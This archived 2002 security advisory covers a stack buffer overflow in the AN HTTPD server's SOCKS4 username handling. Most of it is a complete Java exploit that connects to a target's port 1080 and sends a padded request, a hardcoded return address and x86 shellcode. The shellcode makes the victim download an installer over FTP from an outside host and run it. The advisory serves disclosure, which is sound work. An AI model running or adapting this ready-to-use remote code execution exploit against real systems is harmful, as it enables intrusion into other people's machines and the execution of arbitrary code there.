TUCoPS :: Web :: Servers :: anhttpds.txt

AN HTTPD Stack Overflow 



Advisory Information
--------------------
Name                   : AN HTTPD
Vendor Homepage        : http://www.st.rim.or.jp/~nakata/
Platforms              : Windows9x/Me/NT/2000/XP
Vulnerability Type     : stack overflow( very easy to exploit )
Vendor Contacted       : 17/10/2002
Vendor Replied         : 20/10/2002
Vulnerable Versions    : 1.30 to 1.41c
Non affected version   : 1.41d


Description
--------------------
AN HTTPD is a Japanese multi purpose server software.
It can work as a SOCKS4 server.

We found an exploitable buffer overflow problem in AN HTTPD Version 1.41c.
Sending a SOCKS4 request with long username cause a buffer overflow. This
vulnerability allows a remote attacker to execute arbitary code on the 
 target host.


Proof of Concept
----------------
anhttpd141c_exploit.java

/*///////////////////////////////////////////////////////////////////////////

 AN HTTPD Version 1.41c SOCKS4 username buffer overflow exploit
  for Japanese Windows 2000 Pro (SP2)

 written by Kanatoko <anvil@jumperz.net>
 http://www.jumperz.net/

///////////////////////////////////////////////////////////////////////////*/

import java.net.*;
import java.io.*;

public class anhttpd141c_exploit
{
private static final int SOCKS_PORT	= 1080;

private String targetHost;
//----------------------------------------------------------------------------
public static void main( String[] args )
throws Exception
{
if( args.length != 1 )
	{
	System.out.println( "Usage: java anhttpd141c_exploit TARGETHOST( or IP )" );
	return;
	}
anhttpd141c_exploit instance = new anhttpd141c_exploit( args[ 0 ] );
instance.doIt();
}
//----------------------------------------------------------------------------
public anhttpd141c_exploit( String IN_targetHost )
throws Exception
{
targetHost	= IN_targetHost;
}
//----------------------------------------------------------------------------
private void doIt()
throws Exception
{
Socket socket	= new Socket( targetHost, SOCKS_PORT );
OutputStream os	= socket.getOutputStream();

byte[] socks4_request = {
(byte)0x04, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01
};

	// egg: download and start installing Netscape4.79 :)
	// http://www.jumperz.net/egg_netscape.cpp
byte[] egg = {
(byte)0x55, (byte)0x8B, (byte)0xEC, (byte)0x53, (byte)0xEB, (byte)0x57, (byte)0x90, (byte)0x90, 
(byte)0x90, (byte)0x5B, (byte)0x33, (byte)0xC0, (byte)0x88, (byte)0x63, (byte)0x01, (byte)0x88, 
(byte)0x63, (byte)0x03, (byte)0x83, (byte)0xC3, (byte)0x68, (byte)0x88, (byte)0x23, (byte)0x88, 
(byte)0x63, (byte)0x21, (byte)0x88, (byte)0x63, (byte)0x2E, (byte)0x83, (byte)0xEB, (byte)0x68, 
(byte)0x53, (byte)0x83, (byte)0xC3, (byte)0x02, (byte)0x53, (byte)0xB9, (byte)0xC2, (byte)0x1B, 
(byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x50, (byte)0x83, (byte)0xC3, (byte)0x02, 
(byte)0x53, (byte)0xB9, (byte)0x8B, (byte)0x38, (byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, 
(byte)0x59, (byte)0xB9, (byte)0xB8, (byte)0x0E, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, 
(byte)0x83, (byte)0xC3, (byte)0x65, (byte)0x53, (byte)0xB9, (byte)0x4A, (byte)0x9B, (byte)0x01, 
(byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x83, (byte)0xC3, (byte)0x21, (byte)0x53, (byte)0xB9, 
(byte)0x4A, (byte)0x9B, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0xB8, (byte)0x94, 
(byte)0x8F, (byte)0xE6, (byte)0x77, (byte)0xFF, (byte)0xD0, (byte)0xE8, (byte)0xA7, (byte)0xFF, 
(byte)0xFF, (byte)0xFF, (byte)0x77, (byte)0x58, (byte)0x71, (byte)0x58, (byte)0x62, (byte)0x69, 
(byte)0x6E, (byte)0x61, (byte)0x72, (byte)0x79, (byte)0x0A, (byte)0x67, (byte)0x65, (byte)0x74, 
(byte)0x20, (byte)0x2F, (byte)0x70, (byte)0x75, (byte)0x62, (byte)0x2F, (byte)0x63, (byte)0x6F, 
(byte)0x6D, (byte)0x6D, (byte)0x75, (byte)0x6E, (byte)0x69, (byte)0x63, (byte)0x61, (byte)0x74, 
(byte)0x6F, (byte)0x72, (byte)0x2F, (byte)0x65, (byte)0x6E, (byte)0x67, (byte)0x6C, (byte)0x69, 
(byte)0x73, (byte)0x68, (byte)0x2F, (byte)0x34, (byte)0x2E, (byte)0x37, (byte)0x39, (byte)0x2F, 
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x2F, 
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x39, 
(byte)0x35, (byte)0x5F, (byte)0x6F, (byte)0x72, (byte)0x5F, (byte)0x6E, (byte)0x74, (byte)0x2F, 
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x70, (byte)0x6C, (byte)0x65, (byte)0x74, (byte)0x65, 
(byte)0x5F, (byte)0x69, (byte)0x6E, (byte)0x73, (byte)0x74, (byte)0x61, (byte)0x6C, (byte)0x6C, 
(byte)0x2F, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, (byte)0x64, (byte)0x34, (byte)0x37, 
(byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, (byte)0x0A, (byte)0x71, (byte)0x75, 
(byte)0x69, (byte)0x74, (byte)0x58, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x65, 
(byte)0x78, (byte)0x65, (byte)0x20, (byte)0x2D, (byte)0x73, (byte)0x3A, (byte)0x71, (byte)0x20, 
(byte)0x2D, (byte)0x41, (byte)0x20, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x6E, 
(byte)0x65, (byte)0x74, (byte)0x73, (byte)0x63, (byte)0x61, (byte)0x70, (byte)0x65, (byte)0x2E, 
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x58, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, 
(byte)0x64, (byte)0x34, (byte)0x37, (byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, 
(byte)0x58
};

byte[] jmp_esp = {
(byte)0x02, (byte)0x4E, (byte)0x02, (byte)0x78
};

os.write( socks4_request );

	//where is memset? :0
for( int i = 0; i < 1020; ++i )
	{
	os.write( (byte)0x41 );
	}

os.write( jmp_esp );
os.write( egg );
os.write( (byte)0x00 );
}
//----------------------------------------------------------------------------
}

-- 
Kanatoko  <anvil@jumperz.net>
JUMPERZ.NET : http://www.jumperz.net/(Japanese)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH